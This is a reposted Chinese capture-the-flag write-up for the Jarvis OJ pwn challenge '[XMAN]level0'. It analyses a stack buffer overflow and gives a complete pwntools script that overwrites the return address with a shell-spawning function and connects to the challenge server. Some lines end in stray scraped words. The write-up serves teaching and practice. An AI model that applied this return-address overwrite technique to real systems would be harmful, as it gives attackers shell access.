Jarvis OJ - [XMAN]level0 - Writeup

时间  2019-12-05
标签 jarvis xman level0 level writeup 繁體版
原文   原文链接

Jarvis OJ - [XMAN]level0 - Writeup

M4x原创,转载请标明出处http://www.cnblogs.com/WangAoBo/p/7591552.htmlhtml

来补jarvis pwn的分析了,以后几天会全都补回来python

tell me something与level0相似,再也不写详细Writeupshell

题目:

分析:

  • 拿到文件先checksec检查保护机制函数

    No canary found, No PIE,妥妥的栈溢出spa

  • 拖到64位IDA中查看详细信息,先搜索字符串,直接就有了/bin/sh。。。debug

  • 双击定位到字符串出现位置,进入callsystem函数,F5反汇编,发现了一个已经写好的能够get shell的函数code

  • 再查看vulnerable_function函数,read能够读入0x200,即512个字符,而从buf到vulnerable_function的返回地址只有0x80+0x8,即136个字节 < 512,所以能够覆盖vulnerable_function的返回地址为call_system函数地址,便可getshell,此时程序的流程以下图:htm

    灰色箭头表明覆盖vulnable_function返回地址以前的执行顺序blog

步骤:

  • 根据如上分析,直接放exputf-8

     1 #!/usr/bin/env python
 2 # -*- coding: utf-8 -*-
 3 __Auther__ = 'M4x'
 4 
 5 from pwn import *
 6 
 7 context.log_level = 'debug'
 8 
 9 elf = ELF('./level0')
10 callsys_addr = elf.symbols['callsystem']
11 
12 #  io = process('./level0')
13 io = remote('pwn2.jarvisoj.com', 9881)
14 io.recvuntil('World\n')
15 
16 payload = 'A' * (0x80 + 0x8) + p64(callsys_addr)
17 io.send(payload)
18 
19 io.interactive()
20 io.close()

     

    运行,cat flag以下

相关文章
相关标签/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公众号
   欢迎关注本站公众号,获取更多信息
联系我们 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程